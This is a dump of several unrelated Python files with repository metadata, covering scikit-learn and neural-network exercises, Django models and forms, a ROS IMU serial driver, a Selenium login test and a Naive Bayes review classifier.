accuracies = cross_val_score(estimator=classifier, X=X_train, y=y_train, cv=10)
print("Accuracy: {:.2f} %".format(accuracies.mean() * 100))
print('-' * 38)
print("Standard Deviation: {:.2f} %".format(accuracies.std() * 100))
print('-' * 38)
# Applying Grid Search to find the best model and the best parameters
from sklearn.model_selection import GridSearchCV
parameters = [{'C': [0.25, 0.5, 0.75, 1], 'penalty': ['l2']}]
grid_search = GridSearchCV(estimator=classifier,
param_grid=parameters,
scoring='accuracy',
cv=10,
n_jobs=-1)
grid_search.fit(X_train, y_train)
best_accuracy = grid_search.best_score_
best_parameters = grid_search.best_params_
print("Best Accuracy: {:.2f} %".format(best_accuracy * 100))
print('-' * 38)
print("Best Parameters:", best_parameters)
print('-' * 38)
# # Visualising the Training set results
# from matplotlib.colors import ListedColormap
#
# X_set, y_set = sc.inverse_transform(X_train), y_train
# X1, X2 = np.meshgrid(np.arange(start=X_set[:, 0].min() - 10, stop=X_set[:, 0].max() + 10, step=0.25),
# np.arange(start=X_set[:, 1].min() - 1000, stop=X_set[:, 1].max() + 1000, step=0.25))
# plt.contourf(X1, X2, classifier.predict(sc.transform(np.array([X1.ravel(), X2.ravel()]).T)).reshape(X1.shape),
# alpha=0.75, cmap=ListedColormap(('red', 'green')))
# plt.xlim(X1.min(), X1.max())
# plt.ylim(X2.min(), X2.max())
# for i, j in enumerate(np.unique(y_set)):
# plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1], c=ListedColormap(('red', 'green'))(i), label=j)
# plt.title('Logistic Regression (Training set)')
# plt.xlabel('Age')
# plt.ylabel('Estimated Salary')
# plt.legend()
# plt.show()
#
#
# # Visualising the Test set results
# from matplotlib.colors import ListedColormap
#
# X_set, y_set = sc.inverse_transform(X_test), y_test
# X1, X2 = np.meshgrid(np.arange(start=X_set[:, 0].min() - 10, stop=X_set[:, 0].max() + 10, step=0.25),
# np.arange(start=X_set[:, 1].min() - 1000, stop=X_set[:, 1].max() + 1000, step=0.25))
# plt.contourf(X1, X2, classifier.predict(sc.transform(np.array([X1.ravel(), X2.ravel()]).T)).reshape(X1.shape),
# alpha=0.75, cmap=ListedColormap(('red', 'green')))
# plt.xlim(X1.min(), X1.max())
# plt.ylim(X2.min(), X2.max())
# for i, j in enumerate(np.unique(y_set)):
# plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1], c=ListedColormap(('red', 'green'))(i), label=j)
# plt.title('Logistic Regression (Test set)')
# plt.xlabel('Age')
# plt.ylabel('Estimated Salary')
# plt.legend()
# plt.show()
| [
"[email protected]"
] | |
a6f4a9ee2d2739446d5dcbb227234a4968947e70 | 5997170436ca5194798a3d439aaa3efd3315e4cf | /MedDonate/MedicalDonation/migrations/0001_initial.py | 40be556ff5c6d754bb4b403122ded9700d5c1d21 | [] | no_license | khush611/MedDonate | d6e327ce40e403e0c5c2dcad7514aa823b3d7308 | 14a67a5a860a25fb617c31ccd65a6a12b23b1508 | refs/heads/master | 2020-04-06T12:46:50.339471 | 2018-11-12T09:05:42 | 2018-11-12T09:05:42 | 157,470,339 | 0 | 0 | null | 2018-11-14T01:18:12 | 2018-11-14T01:18:12 | null | UTF-8 | Python | false | false | 2,033 | py | # Generated by Django 2.1.2 on 2018-11-10 08:56
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Collector',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64)),
('address', models.CharField(max_length=128)),
('pinCode', models.IntegerField()),
('Phone_no', models.IntegerField()),
('BirthDate', models.DateField()),
('UID', models.IntegerField(unique=True)),
('email', models.EmailField(max_length=64)),
('username', models.CharField(max_length=16, unique=True)),
('password', models.CharField(max_length=16)),
('Driving_License', models.CharField(max_length=32)),
('Driving_License_image', models.FileField(upload_to='photos/collector/DL')),
('image', models.FileField(upload_to='photos/collector')),
],
),
migrations.CreateModel(
name='Doner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64)),
('address', models.CharField(max_length=128)),
('pinCode', models.IntegerField()),
('Phone_no', models.IntegerField()),
('BirthDate', models.DateField()),
('UID', models.IntegerField(unique=True)),
('email', models.EmailField(max_length=64)),
('username', models.CharField(max_length=16, unique=True)),
('password', models.CharField(max_length=16)),
('image', models.FileField(upload_to='photos/doner')),
],
),
]
| [
"[email protected]"
] | |
53fbaa98a2fa8762b4331d9287ca48ffecc9af8a | 2eaecdb1ed42170463993b8b2285296c5ef2231d | /apps/declaraciontestigo/forms.py | e91d599b1d938015cd79ed8379cab26b2fd135c4 | [] | no_license | ivanfdaza/tribunaleclesiasticoIIS | 9639fc66a2c99baa45b8276f4a1e035bdf294e2e | acb164ab8464b71d0461acf03bdd5e3386b57893 | refs/heads/master | 2022-11-21T10:32:14.925326 | 2020-07-23T16:21:26 | 2020-07-23T16:21:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,284 | py | from django import forms
from django.forms import ClearableFileInput
from apps.declaraciontestigo.models import DeclaracionTestigo
class CustomClearableFileInput(ClearableFileInput):
template_with_clear = '<br> <label for="%(clear_checkbox_id)s">%(clear_checkbox_label)s</label> %(clear)s'
class DeclaracionTestigoForm(forms.ModelForm):
class Meta:
model = DeclaracionTestigo
fields = [
# 'proceso',
'nombre',
'fecha',
'testigo',
'observacion',
'docfile',
]
labels = {
# 'proceso': 'Proceso',
'nombre': 'Declaración',
'fecha': 'Fecha',
'testigo': 'Testigo',
'observacion': 'Observación',
'docfile': 'Documento',
}
widgets = {
# 'proceso': forms.Select(attrs={'class': 'form-control'}),
'nombre': forms.Select(attrs={'class': 'form-control'}),
'fecha': forms.SelectDateWidget(attrs={'class': 'form-control'}, years=range(2000, 2050)),
'testigo': forms.Select(attrs={'class': 'form-control'}),
'observacion': forms.Textarea(attrs={'class': 'form-control'}),
'docfile': CustomClearableFileInput,
}
| [
"[email protected]"
] | |
1071e0a432e040c2ffbd0f2afeffdd349b12ae0c | 7b52e887588f8ff050d5f5a9174cb397d8a3f5e5 | /odom_scooter/razor_imu_9dof/nodes/imu_node.py | c68e7f55c2bdb27e129022a419dffbc72fd813e7 | [] | no_license | RajathSwaroop/Autonomous-Scooter | d57d3f87b107924189051de52ca32d0de7a11984 | 9958293bab33b2f19169d0132e3f3a0e5ed2e0be | refs/heads/master | 2021-08-26T06:44:08.401345 | 2017-11-22T00:41:12 | 2017-11-22T00:41:12 | 111,488,657 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,919 | py | #!/usr/bin/env python
# Copyright (c) 2012, Tang Tiong Yew
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import rospy
import serial
import string
import math
import sys
#from time import time
from sensor_msgs.msg import Imu
from tf.transformations import quaternion_from_euler
from dynamic_reconfigure.server import Server
from razor_imu_9dof.cfg import imuConfig
from diagnostic_msgs.msg import DiagnosticArray, DiagnosticStatus, KeyValue
degrees2rad = math.pi/180.0
imu_yaw_calibration = 0.0
# Callback for dynamic reconfigure requests
def reconfig_callback(config, level):
global imu_yaw_calibration
rospy.loginfo("""Reconfigure request for yaw_calibration: %d""" %(config['yaw_calibration']))
#if imu_yaw_calibration != config('yaw_calibration'):
imu_yaw_calibration = config['yaw_calibration']
rospy.loginfo("Set imu_yaw_calibration to %d" % (imu_yaw_calibration))
return config
rospy.init_node("razor_node")
#We only care about the most recent measurement, i.e. queue_size=1
pub = rospy.Publisher('imu', Imu, queue_size=1)
srv = Server(imuConfig, reconfig_callback) # define dynamic_reconfigure callback
diag_pub = rospy.Publisher('diagnostics', DiagnosticArray, queue_size=1)
diag_pub_time = rospy.get_time();
imuMsg = Imu()
# Orientation covariance estimation:
# Observed orientation noise: 0.3 degrees in x, y, 0.6 degrees in z
# Magnetometer linearity: 0.1% of full scale (+/- 2 gauss) => 4 milligauss
# Earth's magnetic field strength is ~0.5 gauss, so magnetometer nonlinearity could
# cause ~0.8% yaw error (4mgauss/0.5 gauss = 0.008) => 2.8 degrees, or 0.050 radians
# i.e. variance in yaw: 0.0025
# Accelerometer non-linearity: 0.2% of 4G => 0.008G. This could cause
# static roll/pitch error of 0.8%, owing to gravity orientation sensing
# error => 2.8 degrees, or 0.05 radians. i.e. variance in roll/pitch: 0.0025
# so set all covariances the same.
imuMsg.orientation_covariance = [
0.0025 , 0 , 0,
0, 0.0025, 0,
0, 0, 0.0025
]
# Angular velocity covariance estimation:
# Observed gyro noise: 4 counts => 0.28 degrees/sec
# nonlinearity spec: 0.2% of full scale => 8 degrees/sec = 0.14 rad/sec
# Choosing the larger (0.14) as std dev, variance = 0.14^2 ~= 0.02
imuMsg.angular_velocity_covariance = [
0.02, 0 , 0,
0 , 0.02, 0,
0 , 0 , 0.02
]
# linear acceleration covariance estimation:
# observed acceleration noise: 5 counts => 20milli-G's ~= 0.2m/s^2
# nonliniarity spec: 0.5% of full scale => 0.2m/s^2
# Choosing 0.2 as std dev, variance = 0.2^2 = 0.04
imuMsg.linear_acceleration_covariance = [
0.04 , 0 , 0,
0 , 0.04, 0,
0 , 0 , 0.04
]
default_port='/dev/ttyACM1'
port = rospy.get_param('~port', default_port)
#read calibration parameters
port = rospy.get_param('~port', default_port)
#accelerometer
accel_x_min = rospy.get_param('~accel_x_min', -250.0)
accel_x_max = rospy.get_param('~accel_x_max', 250.0)
accel_y_min = rospy.get_param('~accel_y_min', -250.0)
accel_y_max = rospy.get_param('~accel_y_max', 250.0)
accel_z_min = rospy.get_param('~accel_z_min', -250.0)
accel_z_max = rospy.get_param('~accel_z_max', 250.0)
# magnetometer
magn_x_min = rospy.get_param('~magn_x_min', -600.0)
magn_x_max = rospy.get_param('~magn_x_max', 600.0)
magn_y_min = rospy.get_param('~magn_y_min', -600.0)
magn_y_max = rospy.get_param('~magn_y_max', 600.0)
magn_z_min = rospy.get_param('~magn_z_min', -600.0)
magn_z_max = rospy.get_param('~magn_z_max', 600.0)
calibration_magn_use_extended = rospy.get_param('~calibration_magn_use_extended', False)
magn_ellipsoid_center = rospy.get_param('~magn_ellipsoid_center', [0, 0, 0])
magn_ellipsoid_transform = rospy.get_param('~magn_ellipsoid_transform', [[0, 0, 0], [0, 0, 0], [0, 0, 0]])
imu_yaw_calibration = rospy.get_param('~imu_yaw_calibration', 0.0)
# gyroscope
gyro_average_offset_x = rospy.get_param('~gyro_average_offset_x', 0.0)
gyro_average_offset_y = rospy.get_param('~gyro_average_offset_y', 0.0)
gyro_average_offset_z = rospy.get_param('~gyro_average_offset_z', 0.0)
#rospy.loginfo("%f %f %f %f %f %f", accel_x_min, accel_x_max, accel_y_min, accel_y_max, accel_z_min, accel_z_max)
#rospy.loginfo("%f %f %f %f %f %f", magn_x_min, magn_x_max, magn_y_min, magn_y_max, magn_z_min, magn_z_max)
#rospy.loginfo("%s %s %s", str(calibration_magn_use_extended), str(magn_ellipsoid_center), str(magn_ellipsoid_transform[0][0]))
#rospy.loginfo("%f %f %f", gyro_average_offset_x, gyro_average_offset_y, gyro_average_offset_z)
# Check your COM port and baud rate
rospy.loginfo("Opening %s...", port)
try:
ser = serial.Serial(port=port, baudrate=57600, timeout=1)
except serial.serialutil.SerialException:
rospy.logerr("IMU not found at port "+port + ". Did you specify the correct port in the launch file?")
#exit
sys.exit(0)
roll=0
pitch=0
yaw=0
seq=0
accel_factor = 9.806 / 256.0 # sensor reports accel as 256.0 = 1G (9.8m/s^2). Convert to m/s^2.
rospy.loginfo("Giving the razor IMU board 5 seconds to boot...")
rospy.sleep(5) # Sleep for 5 seconds to wait for the board to boot
### configure board ###
#stop datastream
ser.write('#o0' + chr(13))
#discard old input
#automatic flush - NOT WORKING
#ser.flushInput() #discard old input, still in invalid format
#flush manually, as above command is not working
discard = ser.readlines()
#set output mode
ser.write('#ox' + chr(13)) # To start display angle and sensor reading in text
rospy.loginfo("Writing calibration values to razor IMU board...")
#set calibration values
ser.write('#caxm' + str(accel_x_min) + chr(13))
ser.write('#caxM' + str(accel_x_max) + chr(13))
ser.write('#caym' + str(accel_y_min) + chr(13))
ser.write('#cayM' + str(accel_y_max) + chr(13))
ser.write('#cazm' + str(accel_z_min) + chr(13))
ser.write('#cazM' + str(accel_z_max) + chr(13))
if (not calibration_magn_use_extended):
ser.write('#cmxm' + str(magn_x_min) + chr(13))
ser.write('#cmxM' + str(magn_x_max) + chr(13))
ser.write('#cmym' + str(magn_y_min) + chr(13))
ser.write('#cmyM' + str(magn_y_max) + chr(13))
ser.write('#cmzm' + str(magn_z_min) + chr(13))
ser.write('#cmzM' + str(magn_z_max) + chr(13))
else:
ser.write('#ccx' + str(magn_ellipsoid_center[0]) + chr(13))
ser.write('#ccy' + str(magn_ellipsoid_center[1]) + chr(13))
ser.write('#ccz' + str(magn_ellipsoid_center[2]) + chr(13))
ser.write('#ctxX' + str(magn_ellipsoid_transform[0][0]) + chr(13))
ser.write('#ctxY' + str(magn_ellipsoid_transform[0][1]) + chr(13))
ser.write('#ctxZ' + str(magn_ellipsoid_transform[0][2]) + chr(13))
ser.write('#ctyX' + str(magn_ellipsoid_transform[1][0]) + chr(13))
ser.write('#ctyY' + str(magn_ellipsoid_transform[1][1]) + chr(13))
ser.write('#ctyZ' + str(magn_ellipsoid_transform[1][2]) + chr(13))
ser.write('#ctzX' + str(magn_ellipsoid_transform[2][0]) + chr(13))
ser.write('#ctzY' + str(magn_ellipsoid_transform[2][1]) + chr(13))
ser.write('#ctzZ' + str(magn_ellipsoid_transform[2][2]) + chr(13))
ser.write('#cgx' + str(gyro_average_offset_x) + chr(13))
ser.write('#cgy' + str(gyro_average_offset_y) + chr(13))
ser.write('#cgz' + str(gyro_average_offset_z) + chr(13))
#print calibration values for verification by user
ser.flushInput()
ser.write('#p' + chr(13))
calib_data = ser.readlines()
calib_data_print = "Printing set calibration values:\r\n"
for line in calib_data:
calib_data_print += line
rospy.loginfo(calib_data_print)
#start datastream
ser.write('#o1' + chr(13))
#automatic flush - NOT WORKING
#ser.flushInput() #discard old input, still in invalid format
#flush manually, as above command is not working - it breaks the serial connection
rospy.loginfo("Flushing first 200 IMU entries...")
for x in range(0, 200):
line = ser.readline()
rospy.loginfo("Publishing IMU data...")
#f = open("raw_imu_data.log", 'w')
while not rospy.is_shutdown():
line = ser.readline()
line = line.replace("#YPRAG=","") # Delete "#YPRAG="
#f.write(line) # Write to the output log file
words = string.split(line,",") # Fields split
if len(words) > 2:
#in AHRS firmware z axis points down, in ROS z axis points up (see REP 103)
yaw_deg = -float(words[0])
yaw_deg = yaw_deg + imu_yaw_calibration
if yaw_deg > 180.0:
yaw_deg = yaw_deg - 360.0
if yaw_deg < -180.0:
yaw_deg = yaw_deg + 360.0
yaw = yaw_deg*degrees2rad
#in AHRS firmware y axis points right, in ROS y axis points left (see REP 103)
pitch = -float(words[1])*degrees2rad
roll = float(words[2])*degrees2rad
# Publish message
# AHRS firmware accelerations are negated
# This means y and z are correct for ROS, but x needs reversing
imuMsg.linear_acceleration.x = -float(words[3]) * accel_factor
imuMsg.linear_acceleration.y = float(words[4]) * accel_factor
imuMsg.linear_acceleration.z = float(words[5]) * accel_factor
imuMsg.angular_velocity.x = float(words[6])
#in AHRS firmware y axis points right, in ROS y axis points left (see REP 103)
imuMsg.angular_velocity.y = -float(words[7])
#in AHRS firmware z axis points down, in ROS z axis points up (see REP 103)
imuMsg.angular_velocity.z = -float(words[8])
q = quaternion_from_euler(roll,pitch,yaw)
imuMsg.orientation.x = q[0]
imuMsg.orientation.y = q[1]
imuMsg.orientation.z = q[2]
imuMsg.orientation.w = q[3]
imuMsg.header.stamp= rospy.Time.now()
imuMsg.header.frame_id = 'base_imu_link'
imuMsg.header.seq = seq
seq = seq + 1
pub.publish(imuMsg)
if (diag_pub_time < rospy.get_time()) :
diag_pub_time += 1
diag_arr = DiagnosticArray()
diag_arr.header.stamp = rospy.get_rostime()
diag_arr.header.frame_id = '1'
diag_msg = DiagnosticStatus()
diag_msg.name = 'Razor_Imu'
diag_msg.level = DiagnosticStatus.OK
diag_msg.message = 'Received AHRS measurement'
diag_msg.values.append(KeyValue('roll (deg)',
str(roll*(180.0/math.pi))))
diag_msg.values.append(KeyValue('pitch (deg)',
str(pitch*(180.0/math.pi))))
diag_msg.values.append(KeyValue('yaw (deg)',
str(yaw*(180.0/math.pi))))
diag_msg.values.append(KeyValue('sequence number', str(seq)))
diag_arr.status.append(diag_msg)
diag_pub.publish(diag_arr)
ser.close
#f.close
| [
"[email protected]"
] | |
50c1da7e80d158879591350990e06900b4c06536 | a90ba4acf951e0f26e625bb52eeba52424b2604f | /Test126/_______test_logon.py | 641676382843377a4e18b8f41ceaee1d5a4f5cdc | [] | no_license | ihtwang/test | 88c340c93da35b41dc249b367081ebb9c74c8640 | bdf8dc80183886a0165e79571f95d50f96099d83 | refs/heads/master | 2021-05-04T19:06:35.507378 | 2018-03-23T13:45:49 | 2018-03-23T13:45:49 | 106,656,978 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,854 | py | # -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
import unittest, time, re
class TestLogon(unittest.TestCase):
def setUp(self):
# 配置文件地址
profile_directory = r"C:\Users\IBM_ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\3fyggsfu.default"
# 加载配置配置
profile = webdriver.FirefoxProfile(profile_directory)
# 启动浏览器配置
self.driver = webdriver.Firefox(profile)
#self.driver = webdriver.Firefox()
self.driver.implicitly_wait(30)
self.base_url = "http://www.126.com/"
self.verificationErrors = []
self.accept_next_alert = True
def test_logon(self):
driver = self.driver
driver.get(self.base_url + "/")
#driver.find_element_by_id("auto-id-1505045564984").clear()
#driver.find_element_by_id("auto-id-1505045564984").send_keys("Wzj1234abcd20")
frame = driver.find_element_by_id('x-URS-iframe')
driver.switch_to_frame(frame)
# XXXX替换为你的用名和密码
#driver.find_element_by_css_selector("form input[name='email']").clear()
#driver.find_element_by_css_selector("form input[name='email']").send_keys("iht_wang")
#time.sleep(1)
#driver.find_element_by_css_selector("form input[name='password']").clear()
#driver.find_element_by_css_selector("form input[name='password']").send_keys("Wzj1234abcd20")
#time.sleep(1)
prompt_info = u"帐号或密码错误"
driver.find_element_by_name("email").clear()
driver.find_element_by_name("email").send_keys("iht_wang1")
driver.find_element_by_name("password").clear()
driver.find_element_by_name("password").send_keys("Wzj1234abcd20")
driver.find_element_by_id("dologin").click()
time.sleep(10)
#获取断言信息进行断言
#text = driver.find_element_by_xpath("//div[@class='error-tt']/p").text
text = driver.find_element_by_xpath("//div[@class='ferrorhead']").text
print u"****" + text
self.assertEqual(text,prompt_info)
#driver.switch_to_default_content()
#text_ = driver.find_element_by_xpath("//*[@id='spnUid']").text
#text_ = driver.find_element_by_css_selector('#spnUid').text
#text_ = driver.find_element_by_id("spnUid").text
#print u"****" + text_
#self.assertEqual("[email protected]", text_)
#time.sleep(10)
#print u"准备退出。。。"
#driver.find_element_by_link_text(u"退出").click()
#print u"退出了"
#time.sleep(15)
def is_element_present(self, how, what):
try: self.driver.find_element(by=how, value=what)
except NoSuchElementException as e: return False
return True
def is_alert_present(self):
try: self.driver.switch_to_alert()
except NoAlertPresentException as e: return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally: self.accept_next_alert = True
def tearDown(self):
#self.driver.quit()
print u"准备关闭浏览器。。。"
time.sleep(15)
self.driver.close()
self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
bea8903df605768e2ecbcbbb21b445fb05b897d0 | 7aadd04d68c16d8e019cf1ae5e3a7a794987a7ab | /Lesson 2/script_7.py | 77f905314909dc41dad57f2b0e805c21c24cfea8 | [] | no_license | TheJodok/NLP-Python | 4267974b79f439fecf5cdae6ffbf2539a23b97de | 840e8e0d63b5400f1300129be5a4a5c197002bf9 | refs/heads/main | 2023-06-14T13:46:21.304858 | 2021-07-14T07:30:37 | 2021-07-14T07:30:37 | 385,835,801 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,039 | py | from reviews import counter, training_counts
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
# Add your review:
review = "Very much learned, such wow, much cool. AI ML NLP fantastic. Speech and Text nice"
review_counts = counter.transform([review])
classifier = MultinomialNB()
training_labels = [0] * 1000 + [1] * 1000
classifier.fit(training_counts, training_labels)
neg = (classifier.predict_proba(review_counts)[0][0] * 100).round()
pos = (classifier.predict_proba(review_counts)[0][1] * 100).round()
if pos > 50:
print("Thank you for your positive review!")
elif neg > 50:
print("We're sorry this hasn't been the best possible lesson for you! We're always looking to improve.")
else:
print("Naive Bayes cannot determine if this is negative or positive. Thank you or we're sorry?")
print("\nAccording to our trained Naive Bayes classifier, the probability that your review was negative was {0}% and the probability it was positive was {1}%.".format(neg, pos)) | [
"[email protected]"
] | |
5ac3d814652dd657e78fb92b8385273d7f562be6 | 9094acb185a2fd1adf70cefa633ed01c7b290149 | /src/seplis/indexer/__init__.py | dddf999669b83cc81c4cc51641bfb060f8744d72 | [] | no_license | jonathan1994/seplis | 65887c1ecfc27bbef5b97820eba731e6ba043601 | d97925b18b67a321d88c0901455cf2fdc14a82c8 | refs/heads/master | 2021-01-17T17:18:16.820975 | 2014-11-28T00:32:04 | 2014-11-28T00:32:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 47 | py | from seplis.indexer.indexer import Show_indexer | [
"[email protected]"
] | |
4c9469f52887fcd668fc289b805b599c3f1bd310 | 8712509880af7544115733099861ac3bb9e818cf | /DeepLearning_AndrewNg_coursera/1neural-network-deep-learning/assignment3/code.py | 2738b146b71dcf7a2441e15bfbc14a3a92adae40 | [] | no_license | most-corner/deeplearning | 94152b111ccefeaa4317093f62e2616cad90d4af | aefe5542cc46f285b4ff34e90212a0e29cc2f5c5 | refs/heads/master | 2020-06-11T22:30:44.216540 | 2019-07-01T14:21:10 | 2019-07-01T14:21:10 | 194,107,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,892 | py | # 1-Packages
import numpy as np
import matplotlib.pyplot as plt
from testCases_v2 import *
import sklearn
import sklearn.datasets
import sklearn.linear_model
from planar_utils import plot_decision_boundary, sigmoid, load_planar_dataset, load_extra_datasets
np.random.seed(1) # set a seed so that the results are consistent
# 2-Dataset
"""
X, Y = load_planar_dataset()
# Visualize the data:
plt.scatter(X[0, :], X[1, :], c = Y.reshape(400), s=40, cmap=plt.cm.Spectral);
# shape of data
shape_X = X.shape
shape_Y = Y.shape
m = X.shape[1]
print("The shape of X is: " + str(shape_X))
print("The shape of Y is: " + str(shape_Y))
print("I have m = %d training examples!" % (m))
"""
# Datasets
noisy_circles, noisy_moons, blobs, gaussian_quantiles, no_structure = load_extra_datasets()
datasets = {"noisy_circles": noisy_circles,
"noisy_moons": noisy_moons,
"blobs": blobs,
"gaussian_quantiles": gaussian_quantiles}
dataset = "gaussian_quantiles"
X, Y = datasets[dataset]
X, Y = X.T, Y.reshape(1, Y.shape[0])
# make blobs binary
if dataset == "blobs":
Y = Y%2
# Visualize the data
plt.scatter(X[0, :], X[1, :], c = Y.reshape(X.shape[1]), s = 40, cmap = plt.cm.Spectral)
# 3-Simple logistic regression
"""
# Train the logistic regression classifier
clf = sklearn.linear_model.LogisticRegressionCV()
clf.fit(X.T, Y.T)
# Plot the decision boundary for logistic regression
plot_decision_boundary(lambda x: clf.predict(x), X, Y)
plt.title("Logistic Regression")
# Print accuracy
LR_predictions = clf.predict(X.T)
print('Accuracy of logistic regression: %d ' % float((np.dot(Y, LR_predictions) + np.dot(1-Y, 1-LR_predictions))/float(Y.size)*100) + '%' + " (percentage of correctly labelled datapoints)")
"""
# 4-Neural network model
# 4.1-Defining the neural network structure
# function: layer_sizes
def layer_sizes(X, Y):
"""
Arguments:
X -- input dataset of shape (input size, number of examples)
Y -- labels of shape (output size, number of examples)
Returns:
n_x -- the size of the input layer
h_h -- the size of the hidden layer
n_y -- the size of the output layer
"""
n_x = X.shape[0] # size of input layer
n_h = 4
n_y = Y.shape[0] # size of output layer
return (n_x, n_h, n_y)
"""
X_assess, Y_assess = layer_sizes_test_case()
(n_x, n_h, n_y) = layer_sizes(X_assess, Y_assess)
print("The size of the input layer is: n_x = " + str(n_x))
print("The size of the hidden layer is: n_h = " + str(n_h))
print("The size of the output layer is: n_y = " + str(n_y))
"""
# 4.2-Initialize the model's parameters
# function: initialize_parameters
def initialize_parameters(n_x, n_h, n_y):
"""
Arguments:
n_x -- size of the input vector
n_h -- size of the hidden layer
n_y -- size of the output layer
Returns:
params -- python dictionary containing your parameters:
W1 -- weight matrix of shape (n_h, n_x)
b1 -- bias vector of shape (n_h, 1)
W2 -- weight matrix of shape (n_y, n_h)
b2 -- bias vector of shape (n_y, 1)
"""
np.random.seed(2) # we set up a seed so that your output matches ours although the initialization is random
W1 = np.random.randn(n_h, n_x)*0.01
b1 = np.zeros((n_h, 1))
W2 = np.random.randn(n_y, n_h)*0.01
b2 = np.zeros((n_y, 1))
assert (W1.shape == (n_h, n_x))
assert (b1.shape == (n_h, 1))
assert (W2.shape == (n_y, n_h))
assert (b2.shape == (n_y, 1))
parameters = {"W1": W1,
"b1": b1,
"W2": W2,
"b2": b2}
return parameters
"""
n_x, n_h, n_y = initialize_parameters_test_case()
parameters = initialize_parameters(n_x, n_h, n_y)
print("W1 = " + str(parameters["W1"]))
print("b1 = " + str(parameters["b1"]))
print("W2 = " + str(parameters["W2"]))
print("b2 = " + str(parameters["b2"]))
"""
# 4.3-The loop
# function: forward_propagation
def forward_propagation(X, parameters):
"""
Argument:
X -- input data of size (n_x, m)
parameters -- python dictionary containing your parameters (output of initialization function)
Returns:
A2 -- the sigmoid output of the second activation
cache -- a dictionary containing "Z1", "A1", "Z2" and "A2"
"""
# Retrieve each parameter from the dictionary "parameters"
W1 = parameters["W1"]
b1 = parameters["b1"]
W2 = parameters["W2"]
b2 = parameters["b2"]
# Implement forward propagation to calculate A2 (probabilities)
Z1 = np.dot(W1, X) + b1
A1 = np.tanh(Z1)
Z2 = np.dot(W2, A1) + b2
A2 = sigmoid(Z2)
assert(A2.shape == (1, X.shape[1]))
cache = {"Z1": Z1,
"A1": A1,
"Z2": Z2,
"A2": A2}
return A2, cache
"""
X_assess, parameters = forward_propagation_test_case()
A2, cache = forward_propagation(X_assess, parameters)
print(np.mean(cache["Z1"]), np.mean(cache["A1"]), np.mean(cache["Z2"]), np.mean(cache["A2"]))
"""
# function: compute_cost
def compute_cost(A2, Y, parameters):
"""
Computes the cross-entropy cost
Arguments:
A2 -- the sigmoid output of the second activation, of shape (1, number of examples)
Y -- "true" labels vector of shape (1, number of examples)
parameters -- python dictionary containing your parameters W1, b1, W2 and b2
Returns:
cost -- cross-entropy cost
"""
m = Y.shape[1] # number of example
# Compute the cross-entropy cost
cost = -(np.dot(Y.reshape(m), np.log(A2).reshape(m)) + np.dot(1-Y.reshape(m), np.log(1-A2).reshape(m)))/m
cost = np.squeeze(cost)
assert(isinstance(cost, float))
return cost
"""
A2, Y_assess, parameters = compute_cost_test_case()
print("cost = " + str(compute_cost(A2, Y_assess, parameters)))
"""
# function: backward_propagation
def backward_propagation(parameters, cache, X, Y):
"""
Implement the backward propagation using the instructions above.
Arguments:
parameters -- python dictionary containing our parameters
cache -- a dictionary containing "Z1", "A1", "Z2" and "A2"
X -- input data of shape (2, number of examples)
Y -- "true" labels vector of shape (1, number of examples)
Returns:
grads -- python dictionary containing your gradients with respect to different parameters
"""
m = X.shape[1]
# First, retrieve W1 and W2 from the dictionary "parameters"
W1 = parameters["W1"]
W2 = parameters["W2"]
# Retrieve also A1 and A2 from dictionary "cache"
A1 = cache["A1"]
A2 = cache["A2"]
# Backward propagation: calculate dW1, db1, dW2, db2
dZ2 = A2 - Y
dW2 = np.dot(dZ2, A1.T) / m
db2 = np.sum(dZ2, axis = 1, keepdims = True) / m
dZ1 = np.dot(W2.T, dZ2) * (1-A1*A1)
